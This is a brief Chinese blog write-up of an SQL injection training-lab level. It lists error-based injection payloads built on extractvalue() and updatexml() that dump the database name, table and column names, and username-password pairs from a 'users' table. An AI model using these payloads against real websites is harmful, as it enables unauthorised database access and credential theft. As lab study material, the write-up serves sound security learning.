Less-5-03
阿新 • • 發佈:2020-09-19
0x01 extractvalue()報錯注入
extractvalue(1,concat(0x7e,(select database()),0x7e))
爆資料庫:
?id=-1' and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+
爆表名:
?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e)) --+
爆列名:
?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),0x7e)) --+
爆欄位:
?id=-1' and extractvalue(1,concat(0x7e,(select concat_ws('-',username,password)from users limit 2,1),0x7e)) --+ #使用concat_ws()函式,逐個爆出
0x02 updatexml()報錯注入
updatexml(1,concat(0x7e,(select database()),0x7e),1)
爆資料庫:
?id=-1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
爆表名:
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1) --+
爆欄位名:
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+
爆資料:
?id=-1' and updatexml(1,concat(0x7e,(select concat_ws('-',username,password) from users limit 0,1),0x7e),1) --+
#使用concat_ws()逐個爆出資料
參考連結:
《sql注入天書》